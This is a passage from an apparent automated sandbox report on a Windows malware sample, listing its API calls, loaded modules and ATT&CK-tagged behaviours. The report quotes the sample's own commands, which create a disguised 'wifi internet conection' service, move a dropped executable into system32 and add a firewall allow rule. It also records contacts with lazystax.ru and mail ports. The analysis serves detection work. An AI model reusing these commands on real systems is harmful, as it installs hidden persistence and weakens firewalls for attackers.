6d250000\n \"netsh.exe\" loaded module \"P2PNETSH.DLL\" at base 6bc80000\n \"netsh.exe\" loaded module \"WLANCFG.DLL\" at base 6a1e0000\n \"netsh.exe\" loaded module \"WWANCFG.DLL\" at base 6d210000\n \"netsh.exe\" loaded module \"PEERDISTSH.DLL\" at base 6a130000\n \"netsh.exe\" loaded module \"OLE32.DLL\" at base 76cf0000\n \"netsh.exe\" loaded module \"CRYPTBASE.DLL\" at base 75940000\n \"netsh.exe\" loaded module \"%WINDIR%\\SYSTEM32\\UXTHEME.DLL\" at base 746e0000\n \"netsh.exe\" loaded module \"CRYPTSP.DLL\" at base 75450000\n \"netsh.exe\" loaded module \"USER32.DLL\" at base 764f0000\n \"netsh.exe\" loaded module \"CLBCATQ.DLL\" at base 75e30000\n \"netsh.exe\" loaded module \"%WINDIR%\\SYSTEM32\\QAGENT.DLL\" at base 6c340000\n \"netsh.exe\" loaded module \"ADVAPI32.DLL\" at base 765f0000\n \"netsh.exe\" loaded module \"API-MS-WIN-SERVICE-MANAGEMENT-L1-1-0.DLL\" at base 77ca0000\n \"netsh.exe\" loaded module \"API-MS-WIN-SERVICE-MANAGEMENT-L2-1-0.DLL\" at base 77ca0000\n \"netsh.exe\" loaded module \"API-MS-WIN-SERVICE-WINSVC-L1-1-0.DLL\" at base 77ca0000\n \"netsh.exe\" loaded module \"API-MS-WIN-SECURITY-LSALOOKUP-L1-1-0.DLL\" at base 77ca0000\n \"netsh.exe\" loaded module \"%WINDIR%\\SYSTEM32\\RSAENH.DLL\" at base 751e0000\n \"netsh.exe\" loaded module \"RPCRTREMOTE.DLL\" at base 759e0000\n \"netsh.exe\" loaded module \"HTTPAPI.DLL\" at base 70a40000\n \"netsh.exe\" loaded module \"USERENV.DLL\" at base 75be0000\n \"netsh.exe\" loaded module \"GPAPI.DLL\" at base 75020000\n \"netsh.exe\" loaded module \"%WINDIR%\\SYSTEM32\\BCRYPTPRIMITIVES.DLL\" at base 75120000\n \"netsh.exe\" loaded module \"OLEAUT32.DLL\" at base 76e50000\n \"svchost.exe\" loaded module \"DHCPCSVC.DLL\" at base 73bd0000\n \"svchost.exe\" loaded module \"IPHLPAPI.DLL\" at base 73da0000\n \"svchost.exe\" loaded module \"RPCRT4.DLL\" at base 76c40000\n \"svchost.exe\" loaded module \"DHCPCSVC6.DLL\" at base 73cb0000\n \"svchost.exe\" loaded module \"%WINDIR%\\SYSTEM32\\NLAAPI.DLL\" at base 740d0000\n \"svchost.exe\" loaded module \"%WINDIR%\\SYSTEM32\\NAPINSP.DLL\" at base 73a60000\n \"svchost.exe\" loaded module \"API-MS-WIN-SECURITY-SDDL-L1-1-0.DLL\" at base 77ca0000\n \"svchost.exe\" loaded module \"%WINDIR%\\SYSTEM32\\PNRPNSP.DLL\" at base 73a40000\n \"svchost.exe\" loaded module \"%WINDIR%\\SYSTEM32\\MSWSOCK.DLL\" at base 75410000\n \"svchost.exe\" loaded module \"DNSAPI.DLL\" at base 752d0000\n \"svchost.exe\" loaded module \"%WINDIR%\\SYSTEM32\\WINRNR.DLL\" at base 73a00000\n \"svchost.exe\" loaded module \"WS2_32.DLL\" at base 77d50000\n \"svchost.exe\" loaded module \"%WINDIR%\\SYSTEM32\\FWPUCLNT.DLL\" at base 73d10000\n \"svchost.exe\" loaded module \"RASADHLP.DLL\" at base 720e0000\n \"svchost.exe\" loaded module \"SSPICLI.DLL\" at base 758d0000\n \"svchost.exe\" loaded module \"API-MS-WIN-SECURITY-LSALOOKUP-L1-1-0.DLL\" at base 77ca0000\n \"svchost.exe\" loaded module \"%WINDIR%\\SYSTEM32\\WSHTCPIP.DLL\" at base 74f70000", "origin": "API Call", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-122", "type": 6, "relevance": 3, "name": "Calls an API typically used to create a directory", "description": "\"308041c7ec841b30a3e2bc6faaf475372a6306962af84cf26424656d52dca739.exe\" called \"CreateDirectoryW\" with parameter %LOCALAPPDATA%\\Microsoft\\Windows\\Caches (UID: 00000000-00004536)\n \"cmd.exe\" called \"CreateDirectoryW\" with parameter %WINDIR%\\system32\\njrbicei\\ (UID: 00000000-00000884)", "origin": "API Call", "attck_id": "T1074.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1074/001"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-128", "type": 6, "relevance": 5, "name": "Calls an API typically used to create a process", "description": "\"308041c7ec841b30a3e2bc6faaf475372a6306962af84cf26424656d52dca739.exe\" called \"CreateProcessW\" with parameter \"\"%WINDIR%\\System32\\cmd.exe\" /C mkdir %WINDIR%\\system32\\njrbicei\\\" - (UID: 00000000-00004536)\n \"308041c7ec841b30a3e2bc6faaf475372a6306962af84cf26424656d52dca739.exe\" called \"CreateProcessW\" with parameter \"\"%WINDIR%\\System32\\cmd.exe\" /C move /Y \"%TEMP%\\clfkcbws.exe\" %WINDIR%\\system32\\njrbicei\\\" - (UID: 00000000-00004536)\n \"308041c7ec841b30a3e2bc6faaf475372a6306962af84cf26424656d52dca739.exe\" called \"CreateProcessW\" with parameter \"\"%WINDIR%\\System32\\sc.exe\" create njrbicei binPath= \"%WINDIR%\\system32\\njrbicei\\clfkcbws.exe /d\\\"C:\\308041c7ec841b30a3e2bc6faa\" - (UID: 00000000-00004536)\n \"308041c7ec841b30a3e2bc6faaf475372a6306962af84cf26424656d52dca739.exe\" called \"CreateProcessW\" with parameter \"\"%WINDIR%\\System32\\sc.exe\" description njrbicei \"wifi internet conection\"\" - (UID: 00000000-00004536)\n \"308041c7ec841b30a3e2bc6faaf475372a6306962af84cf26424656d52dca739.exe\" called \"CreateProcessW\" with parameter \"\"%WINDIR%\\System32\\sc.exe\" start njrbicei\" - (UID: 00000000-00004536)\n \"308041c7ec841b30a3e2bc6faaf475372a6306962af84cf26424656d52dca739.exe\" called \"CreateProcessW\" with parameter \"\"%WINDIR%\\System32\\netsh.exe\" advfirewall firewall add rule name=\"Host-process for services of Windows\" dir=in action=allow prog\" - (UID: 00000000-00004536)\n \"clfkcbws.exe\" called \"CreateProcessA\" with parameter \"svchost.exe\" - (UID: 00000000-00005112)", "origin": "API Call", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-175", "type": 6, "relevance": 1, "name": "Calls an API typically used to load libraries", "description": "\"308041c7ec841b30a3e2bc6faaf475372a6306962af84cf26424656d52dca739.exe\" called \"LoadLibrary\" with a parameter kernel32.dll (UID: 00000000-00004536)\n \"308041c7ec841b30a3e2bc6faaf475372a6306962af84cf26424656d52dca739.exe\" called \"LoadLibrary\" with a parameter WS2_32.dll (UID: 00000000-00004536)\n \"308041c7ec841b30a3e2bc6faaf475372a6306962af84cf26424656d52dca739.exe\" called \"LoadLibrary\" with a parameter dbghelp.dll (UID: 00000000-00004536)\n \"308041c7ec841b30a3e2bc6faaf475372a6306962af84cf26424656d52dca739.exe\" called \"LoadLibrary\" with a parameter KERNEL32.dll (UID: 00000000-00004536)\n \"308041c7ec841b30a3e2bc6faaf475372a6306962af84cf26424656d52dca739.exe\" called \"LoadLibrary\" with a parameter USER32.dll (UID: 00000000-00004536)\n \"308041c7ec841b30a3e2bc6faaf475372a6306962af84cf26424656d52dca739.exe\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00004536)\n \"308041c7ec841b30a3e2bc6faaf475372a6306962af84cf26424656d52dca739.exe\" called \"LoadLibrary\" with a parameter SHELL32.dll (UID: 00000000-00004536)\n \"308041c7ec841b30a3e2bc6faaf475372a6306962af84cf26424656d52dca739.exe\" called \"LoadLibrary\" with a parameter OLEAUT32.dll (UID: 00000000-00004536)\n \"308041c7ec841b30a3e2bc6faaf475372a6306962af84cf26424656d52dca739.exe\" called \"LoadLibrary\" with a parameter msvcr100.dll (UID: 00000000-00004536)\n \"308041c7ec841b30a3e2bc6faaf475372a6306962af84cf26424656d52dca739.exe\" called \"LoadLibrary\" with a parameter ntdll.dll (UID: 00000000-00004536)\n \"308041c7ec841b30a3e2bc6faaf475372a6306962af84cf26424656d52dca739.exe\" called \"LoadLibrary\" with a parameter ole32.dll (UID: 00000000-00004536)\n \"308041c7ec841b30a3e2bc6faaf475372a6306962af84cf26424656d52dca739.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\uxtheme.dll (UID: 00000000-00004536)\n \"308041c7ec841b30a3e2bc6faaf475372a6306962af84cf26424656d52dca739.exe\" called \"LoadLibrary\" with a parameter propsys.dll (UID: 00000000-00004536)\n \"308041c7ec841b30a3e2bc6faaf475372a6306962af84cf26424656d52dca739.exe\" called \"LoadLibrary\" with a parameter comctl32.dll (UID: 00000000-00004536)\n \"308041c7ec841b30a3e2bc6faaf475372a6306962af84cf26424656d52dca739.exe\" called \"LoadLibrary\" with a parameter API-MS-Win-Core-LocalRegistry-L1-1-0.dll (UID: 00000000-00004536)\n \"308041c7ec841b30a3e2bc6faaf475372a6306962af84cf26424656d52dca739.exe\" called \"LoadLibrary\" with a parameter ntmarta.dll (UID: 00000000-00004536)\n \"308041c7ec841b30a3e2bc6faaf475372a6306962af84cf26424656d52dca739.exe\" called \"LoadLibrary\" with a parameter api-ms-win-downlevel-advapi32-l1-1-0.dll (UID: 00000000-00004536)\n \"308041c7ec841b30a3e2bc6faaf475372a6306962af84cf26424656d52dca739.exe\" called \"LoadLibrary\" with a parameter Secur32.dll (UID: 00000000-00004536)\n \"308041c7ec841b30a3e2bc6faaf475372a6306962af84cf26424656d52dca739.exe\" called \"LoadLibrary\" with a parameter API-MS-WIN-DOWNLEVEL-SHLWAPI-L1-1-0.DLL (UID: 00000000-00004536)\n \"clfkcbws.exe\" called \"LoadLibrary\" with a parameter gdi32.dll (UID: 00000000-00005112)\n \"clfkcbws.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\IMM32.DLL (UID: 00000000-00005112)\n \"clfkcbws.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00005112)\n \"clfkcbws.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00005112)\n \"clfkcbws.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00005112)\n \"clfkcbws.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00005112)\n \"clfkcbws.exe\" called \"LoadLibrary\" with a parameter kernel32.dll (UID: 00000000-00005112)\n \"clfkcbws.exe\" called \"LoadLibrary\" with a parameter WS2_32.dll (UID: 00000000-00005112)\n \"clfkcbws.exe\" called \"LoadLibrary\" with a parameter dbghelp.dll (UID: 00000000-00005112)\n \"clfkcbws.exe\" called \"LoadLibrary\" with a parameter KERNEL32.dll (UID: 00000000-00005112)\n \"clfkcbws.exe\" called \"LoadLibrary\" with a parameter USER32.dll (UID: 00000000-00005112)\n \"clfkcbws.exe\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00005112)\n \"clfkcbws.exe\" called \"LoadLibrary\" with a parameter SHELL32.dll (UID: 00000000-00005112)\n \"clfkcbws.exe\" called \"LoadLibrary\" with a parameter OLEAUT32.dll (UID: 00000000-00005112)\n \"clfkcbws.exe\" called \"LoadLibrary\" with a parameter msvcr100.dll (UID: 00000000-00005112)\n \"clfkcbws.exe\" called \"LoadLibrary\" with a parameter SspiCli.dll (UID: 00000000-00005112)\n \"clfkcbws.exe\" called \"LoadLibrary\" with a parameter API-MS-Win-Security-LSALookup-L1-1-0.dll (UID: 00000000-00005112)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter DHCPCMONITOR.DLL (UID: 00000000-00005336)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter Dhcpcsvc.dll (UID: 00000000-00005336)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter Dhcpqec.dll (UID: 00000000-00005336)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter WSHELPER.DLL (UID: 00000000-00005336)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter NSHHTTP.DLL (UID: 00000000-00005336)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter FWCFG.DLL (UID: 00000000-00005336)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter AUTHFWCFG.DLL (UID: 00000000-00005336)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter API-MS-Win-Core-LocalRegistry-L1-1-0.dll (UID: 00000000-00005336)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter IFMON.DLL (UID: 00000000-00005336)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter NETIOHLP.DLL (UID: 00000000-00005336)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter WHHELPER.DLL (UID: 00000000-00005336)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter HNETMON.DLL (UID: 00000000-00005336)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter RPCNSH.DLL (UID: 00000000-00005336)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter DOT3CFG.DLL (UID: 00000000-00005336)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter NAPMONTR.DLL (UID: 00000000-00005336)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter NSHIPSEC.DLL (UID: 00000000-00005336)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter NETTRACE.DLL (UID: 00000000-00005336)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter WCNNETSH.DLL (UID: 00000000-00005336)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter P2PNETSH.DLL (UID: 00000000-00005336)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter WLANCFG.DLL (UID: 00000000-00005336)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter WWANCFG.DLL (UID: 00000000-00005336)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter PEERDISTSH.DLL (UID: 00000000-00005336)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter ole32.dll (UID: 00000000-00005336)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\uxtheme.dll (UID: 00000000-00005336)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter CRYPTSP.dll (UID: 00000000-00005336)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter USER32.dll (UID: 00000000-00005336)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00005336)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter API-MS-WIN-Service-Management-L1-1-0.dll (UID: 00000000-00005336)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter API-MS-WIN-Service-Management-L2-1-0.dll (UID: 00000000-00005336)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter API-MS-WIN-Service-winsvc-L1-1-0.dll (UID: 00000000-00005336)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter API-MS-Win-Security-LSALookup-L1-1-0.dll (UID: 00000000-00005336)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00005336)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter HTTPAPI.dll (UID: 00000000-00005336)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter userenv.dll (UID: 00000000-00005336)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\bcryptprimitives.dll (UID: 00000000-00005336)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter kernel32.dll (UID: 00000000-00005336)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter OLEAUT32.dll (UID: 00000000-00005336)\n \"svchost.exe\" called \"LoadLibrary\" with a parameter Iphlpapi.dll (UID: 00000000-00000364)\n \"svchost.exe\" called \"LoadLibrary\" with a parameter API-MS-Win-Security-SDDL-L1-1-0.dll (UID: 00000000-00000364)\n \"svchost.exe\" called \"LoadLibrary\" with a parameter WS2_32.dll (UID: 00000000-00000364)\n \"svchost.exe\" called \"LoadLibrary\" with a parameter SspiCli.dll (UID: 00000000-00000364)\n \"svchost.exe\" called \"LoadLibrary\" with a parameter API-MS-Win-Security-LSALookup-L1-1-0.dll (UID: 00000000-00000364)", "origin": "API Call", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "module-10", "type": 10, "name": "Loads the RPC (Remote Procedure Call) module DLL", "description": "\"308041c7ec841b30a3e2bc6faaf475372a6306962af84cf26424656d52dca739.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 76C40000\n \"cmd.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 76C40000\n \"sc.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 76C40000\n \"clfkcbws.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 76C40000\n \"netsh.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 76C40000\n \"svchost.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 76C40000", "origin": "Loaded Module", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "registry-25", "type": 3, "relevance": 3, "name": "Reads information about supported languages", "description": "\"308041c7ec841b30a3e2bc6faaf475372a6306962af84cf26424656d52dca739.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\CUSTOMLOCALE\"; Key: \"EN-US\")\n \"308041c7ec841b30a3e2bc6faaf475372a6306962af84cf26424656d52dca739.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\EXTENDEDLOCALE\"; Key: \"EN-US\")\n \"cmd.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\CUSTOMLOCALE\"; Key: \"EN-US\")\n \"cmd.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\EXTENDEDLOCALE\"; Key: \"EN-US\")\n \"cmd.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\LOCALE\"; Key: \"00000409\")", "origin": "Registry Access", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-22", "type": 6, "relevance": 1, "name": "Fails to load modules at runtime", "description": "\"clfkcbws.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"clfkcbws.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]", "origin": "API Call", "attck_id": "T1574.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574/002"}, {"threat_level_human": "informative", "category": "General", "identifier": "target-302", "type": 9, "relevance": 3, "name": "Tries to move files", "description": "Process \"cmd.exe\" with commandline \"/C move /Y \"%TEMP%\\\\clfkcbws.exe\" %WINDIR%\\\\system32\\\\njrbicei\\\\\" (UID: 00000000-00004688)", "origin": "Monitored Target", "attck_id": "T1570", "attck_id_wiki": "https://attack.mitre.org/techniques/T1570"}, {"threat_level_human": "informative", "category": "General", "identifier": "target-25", "type": 9, "relevance": 3, "name": "Spawns new processes", "description": "Spawned process \"cmd.exe\" with commandline \"/C mkdir %WINDIR%\\\\system32\\\\njrbicei\\\\\" (UID: 00000000-00000884)\n Spawned process \"cmd.exe\" with commandline \"/C move /Y \"%TEMP%\\\\clfkcbws.exe\" %WINDIR%\\\\system32\\\\njrbicei\\\\\" (UID: 00000000-00004688)\n Spawned process \"sc.exe\" with commandline \"create njrbicei binPath= \"%WINDIR%\\\\system32\\\\njrbicei\\\\clfkcbws ...\" (UID: 00000000-00002348), Spawned process \"sc.exe\" with commandline \"description njrbicei \"wifi internet conection\"\" (UID: 00000000-00004540), Spawned process \"sc.exe\" with commandline \"start njrbicei\" (UID: 00000000-00000176), Spawned process \"clfkcbws.exe\" with commandline \"/d\"C:\\\\308041c7ec841b30a3e2bc6faaf475372a6306962af84cf26424656d5 ...\" (UID: 00000000-00005112)\n Spawned process \"netsh.exe\" with commandline \"advfirewall firewall add rule name=\"Host-process for services of ...\" (UID: 00000000-00005336), Spawned process \"svchost.exe\" (UID: 00000000-00000364)", "origin": "Monitored Target", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "General", "identifier": "target-103", "type": 9, "relevance": 3, "name": "Spawns new processes that are not known child processes", "description": "Spawned process \"cmd.exe\" with commandline \"/C mkdir %WINDIR%\\\\system32\\\\njrbicei\\\\\" (UID: 00000000-00000884)\n Spawned process \"cmd.exe\" with commandline \"/C move /Y \"%TEMP%\\\\clfkcbws.exe\" %WINDIR%\\\\system32\\\\njrbicei\\\\\" (UID: 00000000-00004688)\n Spawned process \"sc.exe\" with commandline \"create njrbicei binPath= \"%WINDIR%\\\\system32\\\\njrbicei\\\\clfkcbws ...\" (UID: 00000000-00002348), Spawned process \"sc.exe\" with commandline \"description njrbicei \"wifi internet conection\"\" (UID: 00000000-00004540), Spawned process \"sc.exe\" with commandline \"start njrbicei\" (UID: 00000000-00000176), Spawned process \"clfkcbws.exe\" with commandline \"/d\"C:\\\\308041c7ec841b30a3e2bc6faaf475372a6306962af84cf26424656d5 ...\" (UID: 00000000-00005112)\n Spawned process \"netsh.exe\" with commandline \"advfirewall firewall add rule name=\"Host-process for services of ...\" (UID: 00000000-00005336), Spawned process \"svchost.exe\" (UID: 00000000-00000364)", "origin": "Monitored Target", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "General", "identifier": "target-67", "type": 9, "relevance": 10, "name": "Process launched with changed environment", "description": "Process \"clfkcbws.exe\" (UID: 00000000-00005112) was launched with modified environment variables: \"LOCALAPPDATA, USERDOMAIN, APPDATA, USERNAME, Path, TEMP, USERPROFILE, TMP\"\n Process \"clfkcbws.exe\" (UID: 00000000-00005112) was launched with missing environment variables: \"LOGONSERVER, HOMEPATH, HOMEDRIVE\"\n Process \"netsh.exe\" (UID: 00000000-00005336) was launched with new environment variables: \"LOGONSERVER=\"%HOSTNAME%\", HOMEPATH=\"\\Users\\%OSUSER%\", HOMEDRIVE=\"C:\"\"\n Process \"netsh.exe\" (UID: 00000000-00005336) was launched with modified environment variables: \"LOCALAPPDATA, USERDOMAIN, APPDATA, USERNAME, Path, TEMP, USERPROFILE, TMP\"\n Process \"svchost.exe\" (UID: 00000000-00000364) was launched with modified environment variables: \"LOCALAPPDATA, USERDOMAIN, APPDATA, USERNAME, Path, TEMP, USERPROFILE, TMP\"\n Process \"svchost.exe\" (UID: 00000000-00000364) was launched with missing environment variables: \"LOGONSERVER, HOMEPATH, HOMEDRIVE\"", "origin": "Monitored Target", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "General", "identifier": "network-1", "type": 7, "relevance": 1, "name": "Contacts server", "description": "\"<IPv4>:80\"\n \"<IPv4>:443\"\n \"<IPv4>:25\"\n \"<IPv4>:443\"\n \"<IPv4>:25\"\n \"<IPv4>:25\"", "origin": "Network Traffic", "attck_id": "T1071", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-157", "name": "Matched Compiler/Packer signature (DIE)", "description": "\"308041c7ec841b30a3e2bc6faaf475372a6306962af84cf26424656d52dca739\" was detected as \"EP:Microsoft Visual C/C++\" and name: \"Compiler\"\n \"308041c7ec841b30a3e2bc6faaf475372a6306962af84cf26424656d52dca739\" was detected as \"Microsoft Visual C/C++\" and name: \"Compiler\"\n \"308041c7ec841b30a3e2bc6faaf475372a6306962af84cf26424656d52dca739\" was detected as \"Microsoft Linker\" and name: \"Linker\"\n \"clfkcbws.exe\" was detected as \"EP:Microsoft Visual C/C++\" and name: \"Compiler\"\n \"clfkcbws.exe\" was detected as \"Microsoft Visual C/C++\" and name: \"Compiler\"\n \"clfkcbws.exe\" was detected as \"Microsoft Linker\" and name: \"Linker\"", "origin": "Static Parser", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}, {"threat_level_human": "informative", "category": "General", "identifier": "network-51", "type": 7, "relevance": 1, "name": "Queries DNS server", "description": "\"lazystax.ru\"\n \"microsoft-com.mail.protection.outlook.com\"\n \"microsoft.com\"", "origin": "Network Traffic", "attck_id": "T1071.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071/004"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-80", "relevance": 1, "name": "PE file contains executable sections", "description": "\"308041c7ec841b30a3e2bc6faaf475372a6306962af84cf26424656d52dca739\" has an executable section named \".text\"\n \"clfkcbws.exe\" has an executable section named \".text\"", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-95", "name": "PE file contains writable sections", "description": "\"308041c7ec841b30a3e2bc6faaf475372a6306962af84cf26424656d52dca739\" has an writable section named \".data\"\n \"308041c7ec841b30a3e2bc6faaf475372a6306962af84cf26424656d52dca739\" has an writable section named \".text\"\n \"clfkcbws.exe\" has an writable section named \".data\"\n \"clfkcbws.exe\" has an writable section named \".text\"", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-125", "relevance": 3, "name": "PE file has a big raw size section", "description": "Raw size of \".reloc\" is \"0xbe5000\" greater than 0x100000\n Raw size of \".reloc\" is \"0xe20000\" greater than 0x100000", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-146", "name": "PE file contains Debug data directory", "description": "\"308041c7ec841b30a3e2bc6faaf475372a6306962af84cf26424656d52dca739\" has Debug data directory \"IMAGE_DIRECTORY_ENTRY_DEBUG\"\n \"clfkcbws.exe\" has Debug data directory \"IMAGE_DIRECTORY_ENTRY_DEBUG\"", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "Unusual Characteristics", "identifier": "static-18", "relevance": 10, "name": "Matched Compiler/Packer signature", "description": "\"308041c7ec841b30a3e2bc6faaf475372a6306962af84cf26424656d52dca739\" was detected as \"VC8 -> Microsoft Corporation\"\n \"clfkcbws.exe\" was detected as \"VC8 -> Microsoft Corporation\"", "origin": "Static Parser", "attck_id": "T1027.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/002"}, {"threat_level_human": "informative", "category": "Unusual Characteristics", "identifier": "registry-26", "type": 3, "relevance": 2, "name": "Reads the windows installation language", "description": "\"cmd.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\LANGUAGE GROUPS\"; Key: \"1\")", "origin": "Registry Access", "attck_id": "T1614.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1614/001"}, {"threat_level_human": "informative", "category": "Unusual Characteristics", "identifier": "binary-33", "type": 8, "relevance": 3, "name": "Drops executable files inside temp directory", "description": "\"clfkcbws.exe\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- Location: [%TEMP%\\clfkcbws.exe]- [targetUID: 00000000-00004536]", "origin": "Binary File", "attck_id": "T1105", "attck_id_wiki": "https://attack.mitre.org/techniques/T1105"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-126", "type": 6, "relevance": 3, "name": "Tries to access non-existent files (executable)", "description": "\"308041c7ec841b30a3e2bc6faaf475372a6306962af84cf26424656d52dca739.exe\" trying to access non-existent file \"C:\\Windows\\system32\\api-ms-win-core-fibers-l1-1-1.DLL\"\n \"308041c7ec841b30a3e2bc6faaf475372a6306962af84cf26424656d52dca739.exe\" trying to access non-existent file \"C:\\Windows\\system32\\api-ms-win-core-localization-l1-2-1.DLL\"\n \"308041c7ec841b30a3e2bc6faaf475372a6306962af84cf26424656d52dca739.exe\" trying to access non-existent file \"C:\\FLTLIB.DLL\"\n \"308041c7ec841b30a3e2bc6faaf475372a6306962af84cf26424656d52dca739.exe\" trying to access non-existent file \"C:\\dbghelp.dll\"\n \"308041c7ec841b30a3e2bc6faaf475372a6306962af84cf26424656d52dca739.exe\" trying to access non-existent file \"C:\\msvcr100.dll\"\n \"308041c7ec841b30a3e2bc6faaf475372a6306962af84cf26424656d52dca739.exe\" trying to access non-existent file \"C:\\CRYPTBASE.dll\"\n \"308041c7ec841b30a3e2bc6faaf475372a6306962af84cf26424656d52dca739.exe\" trying to access non-existent file \"C:\\PROPSYS.dll\"\n \"308041c7ec841b30a3e2bc6faaf475372a6306962af84cf26424656d52dca739.exe\" trying to access non-existent file \"C:\\apphelp.dll\"\n \"308041c7ec841b30a3e2bc6faaf475372a6306962af84cf26424656d52dca739.exe\" trying to access non-existent file \"C:\\version.DLL\"\n \"308041c7ec841b30a3e2bc6faaf475372a6306962af84cf26424656d52dca739.exe\" trying to access non-existent file \"C:\\ntmarta.dll\"\n \"308041c7ec841b30a3e2bc6faaf475372a6306962af84cf26424656d52dca739.exe\" trying to access non-existent file \"C:\\Secur32.dll\"\n \"308041c7ec841b30a3e2bc6faaf475372a6306962af84cf26424656d52dca739.exe\" trying to access non-existent file \"C:\\SSPICLI.DLL\"\n \"308041c7ec841b30a3e2bc6faaf475372a6306962af84cf26424656d52dca739.exe\" trying to access non-existent file \"C:\\Windows\\System32\\API-MS-WIN-CORE-FIBERS-L1-1-1.DLL\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-264", "type": 6, "relevance": 3, "name": "Creates a thread in a self process", "description": "\"308041c7ec841b30a3e2bc6faaf475372a6306962af84cf26424656d52dca739.exe\" 